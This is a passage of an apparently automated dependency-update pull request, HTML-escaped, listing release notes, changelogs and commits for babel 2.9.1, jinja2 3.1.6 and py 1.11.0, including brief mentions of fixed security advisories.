(truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/python-babel/babel/blob/master/CHANGES.rst\"\u003ebabel's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 2.9.1\u003c/h2\u003e\n\u003cp\u003eBugfixes\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n* The internal locale-data loading functions now validate the name of the locale file to be loaded and only\n  allow files within Babel's data directory.  Thank you to Chris Lyne of Tenable, Inc. for discovering the issue!\n\u003ch2\u003eVersion 2.9.0\u003c/h2\u003e\n\u003cp\u003eUpcoming version support changes\u003cbr /\u003e\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThis version, Babel 2.9, is the last version of Babel to support Python 2.7, Python 3.4, and Python 3.5.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eImprovements\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n* CLDR: Use CLDR 37 – Aarni Koskela (:gh:`734`)\n* Dates: Handle ZoneInfo objects in get_timezone_location, get_timezone_name - Alessio Bogon (:gh:`741`)\n* Numbers: Add group_separator feature in number formatting - Abdullah Javed Nesar (:gh:`726`)\n\u003cp\u003eBugfixes\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n* Dates: Correct default Format().timedelta format to 'long' to mute deprecation warnings – Aarni Koskela\n* Import: Simplify iteration code in \u0026amp;quot;import_cldr.py\u0026amp;quot; – Felix Schwarz\n* Import: Stop using deprecated ElementTree methods \u0026amp;quot;getchildren()\u0026amp;quot; and \u0026amp;quot;getiterator()\u0026amp;quot; – Felix Schwarz\n* Messages: Fix unicode printing error on Python 2 without TTY. – Niklas Hambüchen\n* Messages: Introduce invariant that _invalid_pofile() takes unicode line. – Niklas Hambüchen\n* Tests: fix tests when using Python 3.9 – Felix Schwarz\n* Tests: Remove deprecated 'sudo: false' from Travis configuration – Jon Dufresne\n* Tests: Support Py.test 6.x – Aarni Koskela\n* Utilities: LazyProxy: Handle AttributeError in specified func – Nikiforov Konstantin (:gh:`724`)\n* Utilities: Replace usage of parser.suite with ast.parse – Miro Hrončok\n\nDocumentation\n\u0026lt;/code\u0026gt;\u0026lt;/pre\u0026gt;\n\u0026lt;ul\u0026gt;\n\u0026lt;li\u0026gt;Update parse_number comments – Brad Martin (:gh:\u0026lt;code\u0026gt;708\u0026lt;/code\u0026gt;)\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;Add \u0026lt;strong\u0026gt;iter\u0026lt;/strong\u0026gt; to Catalog documentation – \u0026lt;a href=\u0026quot;https://github.com/CyanNani123\u0026quot;\u0026gt;\u0026lt;code\u0026gt;@​CyanNani123\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt;\u0026lt;/li\u0026gt;\n\u0026lt;/ul\u0026gt;\n\u0026lt;h2\u0026gt;Version 2.8.1\u0026lt;/h2\u0026gt;\n\u0026lt;p\u0026gt;This is solely a patch release to make running tests on Py.test 6+ possible.\u0026lt;/p\u0026gt;\n\u0026lt;p\u0026gt;Bugfixes\u0026lt;/p\u0026gt;\n\u0026lt;!-- raw HTML omitted --\u0026gt;\n\u0026lt;/blockquote\u0026gt;\n\u0026lt;p\u0026gt;... (truncated)\u0026lt;/p\u0026gt;\n\u0026lt;/details\u0026gt;\n\u0026lt;details\u0026gt;\n\u0026lt;summary\u0026gt;Commits\u0026lt;/summary\u0026gt;\n\n\u0026lt;ul\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/a99fa2474c808b51ebdabea18db871e389751559\u0026quot;\u0026gt;\u0026lt;code\u0026gt;a99fa24\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Use 2.9.0's setup.py for 2.9.1\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/60b33e083801109277cb068105251e76d0b7c14e\u0026quot;\u0026gt;\u0026lt;code\u0026gt;60b33e0\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Become 2.9.1\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/412015ef642bfcc0d8ba8f4d05cdbb6aac98d9b3\u0026quot;\u0026gt;\u0026lt;code\u0026gt;412015e\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Merge pull request \u0026lt;a href=\u0026quot;https://redirect.github.com/python-babel/babel/issues/782\u0026quot;\u0026gt;#782\u0026lt;/a\u0026gt; from python-babel/locale-basename\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/5caf717ceca4bd235552362b4fbff88983c75d8c\u0026quot;\u0026gt;\u0026lt;code\u0026gt;5caf717\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Disallow special filenames on Windows\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/3a700b5b8b53606fd98ef8294a56f9510f7290f8\u0026quot;\u0026gt;\u0026lt;code\u0026gt;3a700b5\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Run locale identifiers through \u0026lt;code\u0026gt;os.path.basename()\u0026lt;/code\u0026gt;\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/5afe2b2f11dcdd6090c00231d342c2e9cd1bdaab\u0026quot;\u0026gt;\u0026lt;code\u0026gt;5afe2b2\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Merge pull request \u0026lt;a href=\u0026quot;https://redirect.github.com/python-babel/babel/issues/754\u0026quot;\u0026gt;#754\u0026lt;/a\u0026gt; from python-babel/github-ci\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/58de8342f865df88697a4a166191e880e3c84d82\u0026quot;\u0026gt;\u0026lt;code\u0026gt;58de834\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Replace Travis + Appveyor with GitHub Actions (WIP)\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/d1bbc08e845d03d8e1f0dfa0e04983d755f39cb5\u0026quot;\u0026gt;\u0026lt;code\u0026gt;d1bbc08\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; import_cldr: use logging; add -q option\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/156b7fb9f377ccf58c71cf01dc69fb10c7b69314\u0026quot;\u0026gt;\u0026lt;code\u0026gt;156b7fb\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Quiesce CLDR download progress bar if requested (or not a TTY)\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/613dc1700f91c3d40b081948c0dd6023d8ece057\u0026quot;\u0026gt;\u0026lt;code\u0026gt;613dc17\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Make the import warnings about unsupported number systems less verbose\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;Additional commits viewable in \u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/compare/2.1.1...v2.9.1\u0026quot;\u0026gt;compare view\u0026lt;/a\u0026gt;\u0026lt;/li\u0026gt;\n\u0026lt;/ul\u0026gt;\n\u0026lt;/details\u0026gt;\n\n\u0026lt;br /\u0026gt;\n\u003c/code\u003e\u003c/pre\u003e\n\nUpdates `jinja2` from 2.8.0 to 3.1.6\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pallets/jinja/releases\"\u003ejinja2's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e3.1.6\u003c/h2\u003e\n\u003cp\u003eThis is the Jinja 3.1.6 security release, which fixes security issues but does not otherwise change behavior and should not result in breaking changes compared to the latest feature release.\u003c/p\u003e\n\u003cp\u003ePyPI: \u003ca href=\"https://pypi.org/project/Jinja2/3.1.6/\"\u003ehttps://pypi.org/project/Jinja2/3.1.6/\u003c/a\u003e\nChanges: \u003ca href=\"https://jinja.palletsprojects.com/en/stable/changes/#version-3-1-6\"\u003ehttps://jinja.palletsprojects.com/en/stable/changes/#version-3-1-6\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe \u003ccode\u003e|attr\u003c/code\u003e filter does not bypass the environment's attribute lookup, allowing the sandbox to apply its checks. \u003ca href=\"https://github.com/pallets/jinja/security/advisories/GHSA-cpwx-vrp4-4pq7\"\u003ehttps://github.com/pallets/jinja/security/advisories/GHSA-cpwx-vrp4-4pq7\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.1.5\u003c/h2\u003e\n\u003cp\u003eThis is the Jinja 3.1.5 security fix release, which fixes security issues and bugs but does not otherwise change behavior and should not result in breaking changes compared to the latest feature release.\u003c/p\u003e\n\u003cp\u003ePyPI: \u003ca href=\"https://pypi.org/project/Jinja2/3.1.5/\"\u003ehttps://pypi.org/project/Jinja2/3.1.5/\u003c/a\u003e\nChanges: \u003ca href=\"https://jinja.palletsprojects.com/changes/#version-3-1-5\"\u003ehttps://jinja.palletsprojects.com/changes/#version-3-1-5\u003c/a\u003e\nMilestone: \u003ca href=\"https://github.com/pallets/jinja/milestone/16?closed=1\"\u003ehttps://github.com/pallets/jinja/milestone/16?closed=1\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe sandboxed environment handles indirect calls to \u003ccode\u003estr.format\u003c/code\u003e, such as by passing a stored reference to a filter that calls its argument. \u003ca href=\"https://github.com/pallets/jinja/security/advisories/GHSA-q2x7-8rv6-6q7h\"\u003eGHSA-q2x7-8rv6-6q7h\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eEscape template name before formatting it into error messages, to avoid issues with names that contain f-string syntax. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1792\"\u003e#1792\u003c/a\u003e, \u003ca href=\"https://github.com/pallets/jinja/security/advisories/GHSA-gmj6-6f8f-6699\"\u003eGHSA-gmj6-6f8f-6699\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSandbox does not allow \u003ccode\u003eclear\u003c/code\u003e and \u003ccode\u003epop\u003c/code\u003e on known mutable sequence types. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2032\"\u003e#2032\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eCalling sync \u003ccode\u003erender\u003c/code\u003e for an async template uses \u003ccode\u003easyncio.run\u003c/code\u003e. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1952\"\u003e#1952\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAvoid unclosed \u003ccode\u003eauto_aiter\u003c/code\u003e warnings. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1960\"\u003e#1960\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eReturn an \u003ccode\u003eaclose\u003c/code\u003e-able \u003ccode\u003eAsyncGenerator\u003c/code\u003e from \u003ccode\u003eTemplate.generate_async\u003c/code\u003e. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1960\"\u003e#1960\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAvoid leaving \u003ccode\u003eroot_render_func()\u003c/code\u003e unclosed in \u003ccode\u003eTemplate.generate_async\u003c/code\u003e. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1960\"\u003e#1960\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAvoid leaving async generators unclosed in blocks, includes and extends. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1960\"\u003e#1960\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eThe runtime uses the correct \u003ccode\u003econcat\u003c/code\u003e function for the current environment when calling block references. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1701\"\u003e#1701\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMake \u003ccode\u003e|unique\u003c/code\u003e async-aware, allowing it to be used after another async-aware filter. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1781\"\u003e#1781\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e|int\u003c/code\u003e filter handles \u003ccode\u003eOverflowError\u003c/code\u003e from scientific notation. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1921\"\u003e#1921\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMake compiling deterministic for tuple unpacking in a \u003ccode\u003e{% set ... %}\u003c/code\u003e call. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2021\"\u003e#2021\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix dunder protocol (\u003ccode\u003ecopy\u003c/code\u003e/\u003ccode\u003epickle\u003c/code\u003e/etc) interaction with \u003ccode\u003eUndefined\u003c/code\u003e objects. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2025\"\u003e#2025\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix \u003ccode\u003ecopy\u003c/code\u003e/\u003ccode\u003epickle\u003c/code\u003e support for the internal \u003ccode\u003emissing\u003c/code\u003e object. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2027\"\u003e#2027\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eEnvironment.overlay(enable_async)\u003c/code\u003e is applied correctly. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2061\"\u003e#2061\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eThe error message from \u003ccode\u003eFileSystemLoader\u003c/code\u003e includes the paths that were searched. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1661\"\u003e#1661\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ePackageLoader\u003c/code\u003e shows a clearer error message when the package does not contain the templates directory. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1705\"\u003e#1705\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eImprove annotations for methods returning copies. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1880\"\u003e#1880\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eurlize\u003c/code\u003e does not add \u003ccode\u003emailto:\u003c/code\u003e to values like \u003ccode\u003e@a@b\u003c/code\u003e. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1870\"\u003e#1870\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eTests decorated with \u003ccode\u003e@pass_context\u003c/code\u003e can be used with the \u003ccode\u003e|select\u003c/code\u003e filter. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1624\"\u003e#1624\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUsing \u003ccode\u003eset\u003c/code\u003e for multiple assignment (\u003ccode\u003ea, b = 1, 2\u003c/code\u003e) does not fail when the target is a namespace attribute. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1413\"\u003e#1413\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUsing \u003ccode\u003eset\u003c/code\u003e in all branches of \u003ccode\u003e{% if %}{% elif %}{% else %}\u003c/code\u003e blocks does not cause the variable to be considered initially undefined. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1253\"\u003e#1253\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.1.4\u003c/h2\u003e\n\u003cp\u003eThis is the Jinja 3.1.4 security release, which fixes security issues and bugs but does not otherwise change behavior and should not result in breaking changes.\u003c/p\u003e\n\u003cp\u003ePyPI: \u003ca href=\"https://pypi.org/project/Jinja2/3.1.4/\"\u003ehttps://pypi.org/project/Jinja2/3.1.4/\u003c/a\u003e\nChanges: \u003ca href=\"https://jinja.palletsprojects.com/en/3.1.x/changes/#version-3-1-4\"\u003ehttps://jinja.palletsprojects.com/en/3.1.x/changes/#version-3-1-4\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe \u003ccode\u003exmlattr\u003c/code\u003e filter does not allow keys with \u003ccode\u003e/\u003c/code\u003e solidus, \u003ccode\u003e\u0026gt;\u003c/code\u003e greater-than sign, or \u003ccode\u003e=\u003c/code\u003e equals sign, in addition to disallowing spaces. Regardless of any validation done by Jinja, user input should never be used as keys to this filter, or must be separately validated first. GHSA-h75v-3vvj-5mfj\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.1.3\u003c/h2\u003e\n\u003cp\u003eThis is a fix release for the 3.1.x feature branch.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix for \u003ca href=\"https://github.com/pallets/jinja/security/advisories/GHSA-h5c8-rqwp-cp95\"\u003eGHSA-h5c8-rqwp-cp95\u003c/a\u003e. You are affected if you are using \u003ccode\u003exmlattr\u003c/code\u003e and passing user input as attribute keys.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pallets/jinja/blob/main/CHANGES.rst\"\u003ejinja2's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 3.1.6\u003c/h2\u003e\n\u003cp\u003eReleased 2025-03-05\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe \u003ccode\u003e|attr\u003c/code\u003e filter does not bypass the environment's attribute lookup,\nallowing the sandbox to apply its checks. :ghsa:\u003ccode\u003ecpwx-vrp4-4pq7\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 3.1.5\u003c/h2\u003e\n\u003cp\u003eReleased 2024-12-21\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe sandboxed environment handles indirect calls to \u003ccode\u003estr.format\u003c/code\u003e, such as\nby passing a stored reference to a filter that calls its argument.\n:ghsa:\u003ccode\u003eq2x7-8rv6-6q7h\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eEscape template name before formatting it into error messages, to avoid\nissues with names that contain f-string syntax.\n:issue:\u003ccode\u003e1792\u003c/code\u003e, :ghsa:\u003ccode\u003egmj6-6f8f-6699\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eSandbox does not allow \u003ccode\u003eclear\u003c/code\u003e and \u003ccode\u003epop\u003c/code\u003e on known mutable sequence\ntypes. :issue:\u003ccode\u003e2032\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eCalling sync \u003ccode\u003erender\u003c/code\u003e for an async template uses \u003ccode\u003easyncio.run\u003c/code\u003e.\n:pr:\u003ccode\u003e1952\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAvoid unclosed \u003ccode\u003eauto_aiter\u003c/code\u003e warnings. :pr:\u003ccode\u003e1960\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eReturn an \u003ccode\u003eaclose\u003c/code\u003e-able \u003ccode\u003eAsyncGenerator\u003c/code\u003e from\n\u003ccode\u003eTemplate.generate_async\u003c/code\u003e. :pr:\u003ccode\u003e1960\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAvoid leaving \u003ccode\u003eroot_render_func()\u003c/code\u003e unclosed in\n\u003ccode\u003eTemplate.generate_async\u003c/code\u003e. :pr:\u003ccode\u003e1960\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAvoid leaving async generators unclosed in blocks, includes and extends.\n:pr:\u003ccode\u003e1960\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eThe runtime uses the correct \u003ccode\u003econcat\u003c/code\u003e function for the current environment\nwhen calling block references. :issue:\u003ccode\u003e1701\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eMake \u003ccode\u003e|unique\u003c/code\u003e async-aware, allowing it to be used after another\nasync-aware filter. :issue:\u003ccode\u003e1781\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e|int\u003c/code\u003e filter handles \u003ccode\u003eOverflowError\u003c/code\u003e from scientific notation.\n:issue:\u003ccode\u003e1921\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eMake compiling deterministic for tuple unpacking in a \u003ccode\u003e{% set ... %}\u003c/code\u003e\ncall. :issue:\u003ccode\u003e2021\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eFix dunder protocol (\u003ccode\u003ecopy\u003c/code\u003e/\u003ccode\u003epickle\u003c/code\u003e/etc) interaction with \u003ccode\u003eUndefined\u003c/code\u003e\nobjects. :issue:\u003ccode\u003e2025\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eFix \u003ccode\u003ecopy\u003c/code\u003e/\u003ccode\u003epickle\u003c/code\u003e support for the internal \u003ccode\u003emissing\u003c/code\u003e object.\n:issue:\u003ccode\u003e2027\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eEnvironment.overlay(enable_async)\u003c/code\u003e is applied correctly. :pr:\u003ccode\u003e2061\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eThe error message from \u003ccode\u003eFileSystemLoader\u003c/code\u003e includes the paths that were\nsearched. :issue:\u003ccode\u003e1661\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ePackageLoader\u003c/code\u003e shows a clearer error message when the package does not\ncontain the templates directory. :issue:\u003ccode\u003e1705\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eImprove annotations for methods returning copies. :pr:\u003ccode\u003e1880\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eurlize\u003c/code\u003e does not add \u003ccode\u003emailto:\u003c/code\u003e to values like \u003ccode\u003e@a@b\u003c/code\u003e. :pr:\u003ccode\u003e1870\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/15206881c006c79667fe5154fe80c01c65410679\"\u003e\u003ccode\u003e1520688\u003c/code\u003e\u003c/a\u003e release version 3.1.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/90457bbf33b8662926ae65cdde4c4c32e756e403\"\u003e\u003ccode\u003e90457bb\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/065334d1ee5b7210e1a0a93c37238c86858f2af7\"\u003e\u003ccode\u003e065334d\u003c/code\u003e\u003c/a\u003e attr filter uses env.getattr\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/033c20015c7ca899ab52eb921bb0f08e6d3dd145\"\u003e\u003ccode\u003e033c200\u003c/code\u003e\u003c/a\u003e start version 3.1.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/bc68d4efa99c5f77334f0e519628558059ae8c35\"\u003e\u003ccode\u003ebc68d4e\u003c/code\u003e\u003c/a\u003e use global contributing guide (\u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2070\"\u003e#2070\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/247de5e0c5062a792eb378e50e13e692885ee486\"\u003e\u003ccode\u003e247de5e\u003c/code\u003e\u003c/a\u003e use global contributing guide\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/ab8218c7a1b66b62e0ad6b941bd514e3a64a358f\"\u003e\u003ccode\u003eab8218c\u003c/code\u003e\u003c/a\u003e use project advisory link instead of global\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/b4ffc8ff299dfd360064bea4cd2f862364601ad2\"\u003e\u003ccode\u003eb4ffc8f\u003c/code\u003e\u003c/a\u003e release version 3.1.5 (\u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2066\"\u003e#2066\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/877f6e51be8e1765b06d911cfaa9033775f051d1\"\u003e\u003ccode\u003e877f6e5\u003c/code\u003e\u003c/a\u003e release version 3.1.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/8d588592653b052f957b720e1fc93196e06f207f\"\u003e\u003ccode\u003e8d58859\u003c/code\u003e\u003c/a\u003e remove test pypi\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pallets/jinja/compare/2.8...3.1.6\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `py` from 1.4.30 to 1.11.0\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pytest-dev/py/blob/master/CHANGELOG.rst\"\u003epy's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e1.11.0 (2021-11-04)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eSupport Python 3.11\u003c/li\u003e\n\u003cli\u003eSupport \u003ccode\u003eNO_COLOR\u003c/code\u003e environment variable\u003c/li\u003e\n\u003cli\u003eUpdate vendored apipkg: 1.5 =\u0026gt; 2.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.10.0 (2020-12-12)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eFix a regular expression DoS vulnerability in the py.path.svnwc SVN blame functionality (CVE-2020-29651)\u003c/li\u003e\n\u003cli\u003eUpdate vendored apipkg: 1.4 =\u0026gt; 1.5\u003c/li\u003e\n\u003cli\u003eUpdate vendored iniconfig: 1.0.0 =\u0026gt; 1.1.1\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.9.0 (2020-06-24)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eAdd type annotation stubs for the following modules:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003epy.error\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003epy.iniconfig\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003epy.path\u003c/code\u003e (not including SVN paths)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003epy.io\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003epy.xml\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThere are no plans to type other modules at this time.\u003c/p\u003e\n\u003cp\u003eThe type annotations are provided in external .pyi files, not inline in the\ncode, and may therefore contain small errors or omissions. If you use \u003ccode\u003epy\u003c/code\u003e\nin conjunction with a type checker, and encounter any type errors you believe\nshould be accepted, please report it in an issue.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.8.2 (2020-06-15)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eOn Windows, \u003ccode\u003epy.path.local\u003c/code\u003es which differ only in case now have the same\nPython hash value. Previously, such paths were considered equal but had\ndifferent hashes, which is not allowed and breaks the assumptions made by\ndicts, sets and other users of hashes.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.8.1 (2019-12-27)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eHandle \u003ccode\u003eFileNotFoundError\u003c/code\u003e when trying to import pathlib in \u003ccode\u003epath.common\u003c/code\u003e\non Python 3.4 (\u003ca href=\"https://redirect.github.com/pytest-dev/py/issues/207\"\u003e#207\u003c/a\u003e).\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ccode\u003epy.path.local.samefile\u003c/code\u003e now works correctly in Python 3 on Windows when dealing with symlinks.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.8.0 (2019-02-21)\u003c/h1\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/447bac514febbb5433963582103d48bb27b3db17\"\u003e\u003ccode\u003e447bac5\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.rst\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/6d003d9fee08542b9a5ca663568cb30c75d6c27c\"\u003e\u003ccode\u003e6d003d9\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.rst\u003c/li\u003e\n\u003cli\u003e\u003ca 